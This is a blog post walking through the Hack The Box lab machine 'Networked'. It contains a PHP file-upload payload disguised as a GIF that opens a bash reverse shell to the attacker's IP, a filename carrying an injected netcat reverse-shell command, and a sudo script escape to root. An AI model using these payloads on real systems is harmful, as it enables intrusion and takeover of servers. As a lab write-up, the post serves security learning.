<!doctype html>
<!--
  Minimal Mistakes Jekyll Theme 4.27.3 by Michael Rose
  Copyright 2013-2025 Michael Rose - mademistakes.com | @mmistakes
  Free for personal and commercial use under the MIT license
  https://github.com/mmistakes/minimal-mistakes/blob/master/LICENSE
-->

<html lang="en" class="no-js">
  <head>
    <meta charset="utf-8">

<!-- begin _includes/seo.html --><title>Hack The Box – Networked - IanM.tech</title>
<meta name="description" content="Networked was an easy but very interesting box that left me confused at the end. I have not figured out why the final exploit worked but I plan on setting up an environment to find the reason it worked and update this page.">


  <meta name="author" content="Ian Marrero">
  
  <meta property="article:author" content="Ian Marrero">
  


<meta property="og:type" content="article">
<meta property="og:locale" content="en_US">
<meta property="og:site_name" content="IanM.tech">
<meta property="og:title" content="Hack The Box – Networked">
<meta property="og:url" content="http://localhost:4000/2019/11/hack-the-box-networked/">


  <meta property="og:description" content="Networked was an easy but very interesting box that left me confused at the end. I have not figured out why the final exploit worked but I plan on setting up an environment to find the reason it worked and update this page.">







  <meta property="article:published_time" content="2019-11-02T22:18:00-05:00">






<link rel="canonical" href="http://localhost:4000/2019/11/hack-the-box-networked/">












<!-- end _includes/seo.html -->



  <link href="/feed.xml" type="application/atom+xml" rel="alternate" title="IanM.tech Feed">


<!-- https://t.co/dKP3o1e -->
<meta name="viewport" content="width=device-width, initial-scale=1.0">

<script>
  document.documentElement.className = document.documentElement.className.replace(/\bno-js\b/g, '') + ' js ';
</script>

<!-- For all browsers -->
<link rel="stylesheet" href="/assets/css/main.css">
<link rel="preload" href="https://cdn.jsdelivr.net/npm/@fortawesome/fontawesome-free@5/css/all.min.css" as="style" onload="this.onload=null;this.rel='stylesheet'">
<noscript><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/@fortawesome/fontawesome-free@5/css/all.min.css"></noscript>



    <!-- start custom head snippets -->

<!-- insert favicons. use https://realfavicongenerator.net/ -->
<link rel="apple-touch-icon" sizes="76x76" href="/assets/icons/apple-touch-icon.png?v=2">
<link rel="icon" type="image/png" sizes="32x32" href="/assets/icons/favicon-32x32.png?v=2">
<link rel="icon" type="image/png" sizes="16x16" href="/assets/icons/favicon-16x16.png?v=2">
<link rel="manifest" href="/assets/icons/site.webmanifest">
<link rel="mask-icon" href="/assets/icons/safari-pinned-tab.svg" color="#5bbad5">
<meta name="msapplication-TileColor" content="#da532c">
<meta name="theme-color" content="#ffffff">

<!-- end custom head snippets -->

  </head>

  <body class="layout--single" dir="ltr">
    <nav class="skip-links">
  <ul>
    <li><a href="#site-nav" class="screen-reader-shortcut">Skip to primary navigation</a></li>
    <li><a href="#main" class="screen-reader-shortcut">Skip to content</a></li>
    <li><a href="#footer" class="screen-reader-shortcut">Skip to footer</a></li>
  </ul>
</nav>

    

<div class="masthead">
  <div class="masthead__inner-wrap">
    <div class="masthead__menu">
      <nav id="site-nav" class="greedy-nav">
        
          <a class="site-logo" href="/"><img src="/assets/images/logo.png" alt="IanM.tech"></a>
        
        <a class="site-title" href="/">
          IanM.tech
          
        </a>
        <ul class="visible-links"><li class="masthead__menu-item">
              <a
                href="/posts/"
                
                
              >Posts</a>
            </li><li class="masthead__menu-item">
              <a
                href="/projects/"
                
                
              >Projects</a>
            </li><li class="masthead__menu-item">
              <a
                href="/about/"
                
                
              >About</a>
            </li><li class="masthead__menu-item">
              <a
                href="/contact/"
                
                
              >Contact</a>
            </li></ul>
        
        <button class="search__toggle" type="button">
          <span class="visually-hidden">Toggle search</span>
          <i class="fas fa-search"></i>
        </button>
        
        <button class="greedy-nav__toggle hidden" type="button">
          <span class="visually-hidden">Toggle menu</span>
          <div class="navicon"></div>
        </button>
        <ul class="hidden-links hidden"></ul>
      </nav>
    </div>
  </div>
</div>


    <div class="initial-content">
      





<div id="main" role="main">
  
  <div class="sidebar sticky">
  


<div itemscope itemtype="https://schema.org/Person" class="h-card">

  
    <div class="author__avatar">
      <a href="http://localhost:4000/">
        <img src="/assets/images/bio-photo.jpg" alt="Ian Marrero" itemprop="image" class="u-photo">
      </a>
    </div>
  

  <div class="author__content">
    <h3 class="author__name p-name" itemprop="name">
      <a class="u-url" rel="me" href="http://localhost:4000/" itemprop="url">Ian Marrero</a>
    </h3>
    
      <div class="author__bio p-note" itemprop="description">
        <p>Cybersecurity Engineer</p>

      </div>
    
  </div>

  <div class="author__urls-wrapper">
    <button class="btn btn--inverse">Follow</button>
    <ul class="author__urls social-icons">
      

      
        
          
            <li><a href="https://facebook.com/ian.marrero" rel="nofollow noopener noreferrer me" itemprop="sameAs"><i class="fab fa-fw fa-facebook" aria-hidden="true"></i><span class="label">Facebook</span></a></li>
          
        
          
            <li><a href="https://instagram.com/ian.marrero" rel="nofollow noopener noreferrer me" itemprop="sameAs"><i class="fab fa-fw fa-instagram" aria-hidden="true"></i><span class="label">Instagram</span></a></li>
          
        
          
            <li><a href="https://www.linkedin.com/in/ianmarrero/" rel="nofollow noopener noreferrer me" itemprop="sameAs"><i class="fab fa-fw fa-linkedin" aria-hidden="true"></i><span class="label">LinkedIn</span></a></li>
          
        
          
            <li><a href="https://ianm.tech" rel="nofollow noopener noreferrer me" itemprop="sameAs"><i class="fas fa-fw fa-link" aria-hidden="true"></i><span class="label">Website</span></a></li>
          
        
      

      

      

      

      

      

      

      

      

      

      

      

      

      

      

      

      

      

      

      

      

      

      

      

      

      <!--
  <li>
    <a href="http://link-to-whatever-social-network.com/user/" itemprop="sameAs" rel="nofollow noopener noreferrer me">
      <i class="fas fa-fw" aria-hidden="true"></i> Custom Social Profile Link
    </a>
  </li>
-->
    </ul>
  </div>
</div>

  
  </div>



  <article class="page" itemscope itemtype="https://schema.org/CreativeWork">
    <meta itemprop="headline" content="Hack The Box – Networked">
    <meta itemprop="description" content="Networked was an easy but very interesting box that left me confused at the end. I have not figured out why the final exploit worked but I plan on setting up an environment to find the reason it worked and update this page.">
    <meta itemprop="datePublished" content="2019-11-02T22:18:00-05:00">
    

    <div class="page__inner-wrap">
      
        <header>
          <h1 id="page-title" class="page__title" itemprop="headline">
            <a href="http://localhost:4000/2019/11/hack-the-box-networked/" itemprop="url">Hack The Box – Networked
</a>
          </h1>
          

  <p class="page__meta">
    

    

    
      
      

      <span class="page__meta-readtime">
        <i class="far fa-clock" aria-hidden="true"></i>
        
          4 minute read
        
      </span>
    
  </p>


        </header>
      

      <section class="page__content" itemprop="text">
        
        <p>Networked was an easy but very interesting box that left me confused at the end. I have not figured out why the final exploit worked but I plan on setting up an environment to find the reason it worked and update this page.</p>

<h2 id="content">Content</h2>

<ul>
  <li>Information</li>
  <li>Reconnaissance</li>
  <li>Initial Access &amp; Execution</li>
  <li>User Privilege Escalation</li>
  <li>Root Privilege Escalation</li>
  <li>Data Exfiltration</li>
</ul>

<h2 id="information">Information</h2>

<ul>
  <li>IP: 10.10.10.146</li>
  <li>OS: Linux</li>
</ul>

<h2 id="reconnaissance">Reconnaissance</h2>

<p>I ran map against the target running Nmap against the target, <strong>-sC</strong> to run Nmap scripts, and <strong>-sV</strong> for get service’s version running on port.</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> root@kali:~/htb/boxes/networked# nmap -sC -sV -oA nmap/nmap_scan 10.10.10.146
 Starting Nmap 7.80 ( https://nmap.org ) at 2019-10-31 21:03 EDT
 Nmap scan report for 10.10.10.146
 Host is up (0.077s latency).
 Not shown: 997 filtered ports
 PORT    STATE  SERVICE VERSION
 22/tcp  open   ssh     OpenSSH 7.4 (protocol 2.0)
...
 80/tcp  open   http    Apache httpd 2.4.6 ((CentOS) PHP/5.4.16)
 ...
 443/tcp closed https
 Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
 Nmap done: 1 IP address (1 host up) scanned in 31.81 seconds
</code></pre></div></div>

<p>I discovered port 22 open running SSH. I attempted to connect and try password guessing but it wasn’t fruitful. Port 443 is closed, which is interesting since a web server is installed on the host. I assume the creator of the box doesn’t want us to poke on that service just yet. The last port 80 is running a website. It appears to be a custom photo album web application.</p>

<p><img src="/assets/images/2019/11/image-1.png" alt="" /></p>

<p>Nothing of interest in the main page, so I proceeded to run <strong>gobuster</strong> against the website. <strong>/Upload</strong> and <strong>/backup</strong> directories are found. My initial curiosity lead me to backups.</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>root@kali:~/htb/boxes/networked/nmap# gobuster dir -u 10.10.10.146 -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -o gobuster_medium.txt
...
 /uploads (Status: 301)
 /backup (Status: 301)
</code></pre></div></div>

<p>In the <strong>/backup</strong> directory, I found a <strong>tar</strong> file that contained the source code for the web application. Nothing of interest was found in <strong>index.php</strong>. However, <strong>lib.php</strong> and <strong>upload.php</strong> a vulnerability in how the images are validated before being uploaded.</p>

<p><img src="/assets/images/2019/11/image-1.tiff" alt="" />
<img src="/assets/images/2019/11/image.tiff" alt="" /></p>

<p>The file <strong>lib.php</strong> is a required include in <strong>upload.php</strong>. <strong>upload.php</strong> performs the check before images are uploaded into the application based on the following criteria: file size &lt; 60kb, filename extension must be jpg, gif, and a few other, and lastly it checks for that the file contains the magic bytes of known image formats. <strong>Upload.php</strong> provides a custom upload interface.</p>

<p><img src="/assets/images/2019/11/image-3.png" alt="" /></p>

<h2 id="initial-access--execution">Initial Access &amp; Execution</h2>

<p>Photos.php includes any file in <strong>/uploads</strong> that is not <strong>index.php</strong>. I created a custom payload containing the magic bytes of the gif file format and appended code for a reverse shell. I created a file named <strong>payload.php.jpg</strong> with the following contents.</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>GIF89a;
&lt;?php exec('bash -i &gt;&amp; /dev/tcp/10.10.15.154/8880 0&gt;&amp;1'); ?&gt; 
</code></pre></div></div>

<p>Then I proceeded to upload the payload using <strong>upload.php</strong> file upload tool. I launched a new terminal console, ran netcat on listening mode, and then I clicked “go!”.</p>

<p><img src="/assets/images/2019/11/image-4.png" alt="" /></p>

<p>Next, I proceed to <strong>photos.php</strong> to view the photo album and have the server execute my payload.</p>

<p><img src="/assets/images/2019/11/image-5.png" alt="" /></p>

<p>Now I have obtain initial access and have a shell as apache user.</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>root@kali:~/htb/boxes/networked# nc -lvp 8880
 ...
 bash-4.2$ whoami
 apache
</code></pre></div></div>

<h2 id="user-privilege-escalation">User Privilege Escalation</h2>

<p>I proceed to run <strong>LinEnum.sh</strong>, a great Linux enumeration script but nothing interesting is found since I am running as a limited user, <strong>apache</strong>. Apache had access to <strong>/home/guly</strong> directory. In the directory, I found two files of interest: <strong>crontab.guly</strong>, which runs <strong>check_attack.php</strong> every 15 minutes as a cron job and runs as user guly. <strong>check_attack.php</strong>. looks for files that have been uploaded into <strong>/uploads</strong> and doesn’t meet the requirements and then attempts to remove them. However, there is a vulnerability allows command execution when processing a file for deletion at:</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>exec("nohup /bin/rm -f $path$value &gt; /dev/null 2&gt;&amp;1 &amp;");
</code></pre></div></div>

<p><strong>$value</strong> is not sanitized, and it can be escaped to run custom commands. I use the vulnerability to create a new shell as the owner of the script, guly. To exploit the vulnerability, I create a new file in <strong>/uploads</strong> that contains a netcat command in the filename.</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> bash-4.2$ touch ;nc -c bash 10.10.15.154 8881;                            │
 touch ;nc -c bash 10.10.15.154 8881; 
</code></pre></div></div>

<p><img src="/assets/images/2019/11/image-6.png" alt="" /></p>

<p>I have a new limited shell as user, which I immediately upgraded to a tty shell by creating yet another reverse shell.</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>bash -i &gt;&amp; /dev/tcp/10.10.15.154/8882 0&gt;&amp;1
</code></pre></div></div>

<p>I ran <strong>LinEnum.sh</strong>, a great Linux enumeration script, and discovered a file that could possibly lead to privilege escalation. The same results could have been gathered with basic enumeration techniques.</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> [guly@networked ~]$ sudo -l
 sudo -l
...
 User guly may run the following commands on networked:
     (root) NOPASSWD: /usr/local/sbin/changename.sh
</code></pre></div></div>

<h2 id="root-privilege-escalation">Root Privilege Escalation</h2>

<p>The file <strong>changeme.sh</strong> is used to replace a network interface script at <strong>/etc/sysconfig/network-scripts/ifcfg-guly</strong> and runs as root. The script file prompts the users for four inputs. I managed to fuzz the application into giving me a root shell. However, I am not entirely sure why I was able to escape the loop and get a root shell. I think the flaw is in <strong>while [[ ! $x =~ $regexp ]]</strong>;. Because the variable <strong>$x</strong> is not quoted, I am able to escape the loop by passing <strong>-e /bin/bash</strong> as an input and get a root shell.</p>

<h2 id="data-exfiltration">Data Exfiltration</h2>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> [root@networked ~]# cat root.txt                                                
 cat root.txt                                                                                         
 
</code></pre></div></div>

<p>If you know why <strong>-e /bin/bash</strong> was able to escape the loop, please drop a comment below.</p>

        
      </section>

      <footer class="page__meta">
        
        
  


  

  <p class="page__taxonomy">
    <strong><i class="fas fa-fw fa-tags" aria-hidden="true"></i> Tags: </strong>
    <span itemprop="keywords">
    
      <a href="/tags/#hackthebox" class="page__taxonomy-item p-category" rel="tag">hackthebox</a>
    
    </span>
  </p>




  


  

  <p class="page__taxonomy">
    <strong><i class="fas fa-fw fa-folder-open" aria-hidden="true"></i> Categories: </strong>
    <span itemprop="keywords">
    
      <a href="/categories/#hack-the-box" class="page__taxonomy-item p-category" rel="tag">Hack The Box</a>
    
    </span>
  </p>


        

  <p class="page__date"><strong><i class="fas fa-fw fa-calendar-alt" aria-hidden="true"></i> Updated:</strong> <time class="dt-published" datetime="2019-11-02T22:18:00-05:00">November 2, 2019</time></p>

      </footer>

      <section class="page__share">
  <h4 class="page__share-title">Share on</h4>

  <a href="https://x.com/intent/tweet?text=Hack+The+Box+%26%238211%3B+Networked%20http%3A%2F%2Flocalhost%3A4000%2F2019%2F11%2Fhack-the-box-networked%2F" class="btn btn--x" aria-label="Share on X" onclick="window.open(this.href, 'window', 'left=20,top=20,width=500,height=500,toolbar=1,resizable=0'); return false;" title="Share on X">
    <i class="fab fa-fw fa-x-twitter" aria-hidden="true"></i><span> X</span>
  </a>

  <a href="https://www.facebook.com/sharer/sharer.php?u=http%3A%2F%2Flocalhost%3A4000%2F2019%2F11%2Fhack-the-box-networked%2F" class="btn btn--facebook" aria-label="Share on Facebook" onclick="window.open(this.href, 'window', 'left=20,top=20,width=500,height=500,toolbar=1,resizable=0'); return false;" title="Share on Facebook">
    <i class="fab fa-fw fa-facebook" aria-hidden="true"></i><span> Facebook</span>
  </a>

  <a href="https://www.linkedin.com/shareArticle?mini=true&url=http://localhost:4000/2019/11/hack-the-box-networked/" class="btn btn--linkedin" aria-label="Share on LinkedIn" onclick="window.open(this.href, 'window', 'left=20,top=20,width=500,height=500,toolbar=1,resizable=0'); return false;" title="Share on LinkedIn">
    <i class="fab fa-fw fa-linkedin" aria-hidden="true"></i><span> LinkedIn</span>
  </a>

  <a href="https://bsky.app/intent/compose?text=Hack+The+Box+%26%238211%3B+Networked%20http%3A%2F%2Flocalhost%3A4000%2F2019%2F11%2Fhack-the-box-networked%2F" class="btn btn--bluesky" onclick="window.open(this.href, 'window', 'left=20,top=20,width=500,height=500,toolbar=1,resizable=0'); return false;" title="Share on Bluesky">
    <i class="fab fa-fw fa-bluesky" aria-hidden="true"></i><span> Bluesky</span>
  </a>
</section>


      
  <nav class="pagination">
    
      <a href="/2019/10/giac-gcih-certified-and-some-tips/" class="pagination--pager" title="GIAC GCIH Certified!… and some tips.">Previous</a>
    
    
      <a href="/2020/02/regex-cheatsheet/" class="pagination--pager" title="Regex Cheatsheet">Next</a>
    
  </nav>


    </div>

    
  </article>

  
  
    
<div class="page__related">
  
  <h2 class="page__related-title">You May Also Enjoy</h2>
  <div class="grid__wrapper">
    
      
      



<div class="grid__item">
  <article class="archive__item" itemscope itemtype="https://schema.org/CreativeWork">
    
    <h2 class="archive__item-title no_toc" itemprop="headline">
      
        <a href="/2025/11/Where-Recent-Donations-Went-During-the-Government-Shutdown/" rel="permalink">Where Recent Donations Went During the Government Shutdown
</a>
      
    </h2>
    <span style="font-size: 14px;">November 08, 2025</span>
    

  <p class="page__meta">
    

    

    
      
      

      <span class="page__meta-readtime">
        <i class="far fa-clock" aria-hidden="true"></i>
        
          less than 1 minute read
        
      </span>
    
  </p>


    <p class="archive__item-excerpt" itemprop="description">I’d like to thank everyone who chose to donate through my VA Disability Calculator app. During the recent government shutdown, those funds were used to purch...</p>
  </article>
</div>

    
      
      



<div class="grid__item">
  <article class="archive__item" itemscope itemtype="https://schema.org/CreativeWork">
    
    <h2 class="archive__item-title no_toc" itemprop="headline">
      
        <a href="/2025/11/VA-Disability-Calculator-App-Update-1.26.0/" rel="permalink">VA Compensation Calculator iOS App — Update 1.26.0
</a>
      
    </h2>
    <span style="font-size: 14px;">November 06, 2025</span>
    

  <p class="page__meta">
    

    

    
      
      

      <span class="page__meta-readtime">
        <i class="far fa-clock" aria-hidden="true"></i>
        
          less than 1 minute read
        
      </span>
    
  </p>


    <p class="archive__item-excerpt" itemprop="description">I’ve released an updated version of my VA Disability Calculator iOS app (version 1.26.0).

</p>
  </article>
</div>

    
      
      



<div class="grid__item">
  <article class="archive__item" itemscope itemtype="https://schema.org/CreativeWork">
    
    <h2 class="archive__item-title no_toc" itemprop="headline">
      
        <a href="/2025/05/VA-Disability-Calculator-App-Release/" rel="permalink">VA Compensation Calculator iOS App Released!
</a>
      
    </h2>
    <span style="font-size: 14px;">May 19, 2025</span>
    

  <p class="page__meta">
    

    

    
      
      

      <span class="page__meta-readtime">
        <i class="far fa-clock" aria-hidden="true"></i>
        
          less than 1 minute read
        
      </span>
    
  </p>


    <p class="archive__item-excerpt" itemprop="description">I’ve released my first iOS application: VA Compensation Calculator, a privacy-focused tool designed to help veterans calculate VA disability ratings and esti...</p>
  </article>
</div>

    
      
      



<div class="grid__item">
  <article class="archive__item" itemscope itemtype="https://schema.org/CreativeWork">
    
    <h2 class="archive__item-title no_toc" itemprop="headline">
      
        <a href="/2024/05/Cloud-Security-Engineer-Resources/" rel="permalink">Cloud Security Engineer Resources
</a>
      
    </h2>
    <span style="font-size: 14px;">May 30, 2024</span>
    

  <p class="page__meta">
    

    

    
      
      

      <span class="page__meta-readtime">
        <i class="far fa-clock" aria-hidden="true"></i>
        
          1 minute read
        
      </span>
    
  </p>


    <p class="archive__item-excerpt" itemprop="description">Cloud Security Engineer Resources

</p>
  </article>
</div>

    
  </div>
</div>

  
  
</div>

      
    </div>

    
      <div class="search-content">
        <div class="search-content__inner-wrap"><form class="search-content__form" onkeydown="return event.key != 'Enter';" role="search">
    <label class="sr-only" for="search">
      Enter your search term...
    </label>
    <input type="search" id="search" class="search-input" tabindex="-1" placeholder="Enter your search term..." />
  </form>
  <div id="results" class="results"></div></div>

      </div>
    

    <div id="footer" class="page__footer">
      <footer>
        <!-- start custom footer snippets -->

<!-- end custom footer snippets -->
        <div class="page__footer-disclaimer">
  <p>
    <strong>Disclaimer:</strong>
    The views and opinions expressed on this website and associated platforms are solely my own
    and do not represent those of my employer. References to products, tools, or services are for
    informational purposes only and do not constitute endorsement.
  </p>
</div>
      </footer>
    </div>

    
  <script src="/assets/js/main.min.js"></script>




<script src="/assets/js/lunr/lunr.min.js"></script>
<script src="/assets/js/lunr/lunr-store.js"></script>
<script src="/assets/js/lunr/lunr-en.js"></script>






  </body>
</html>
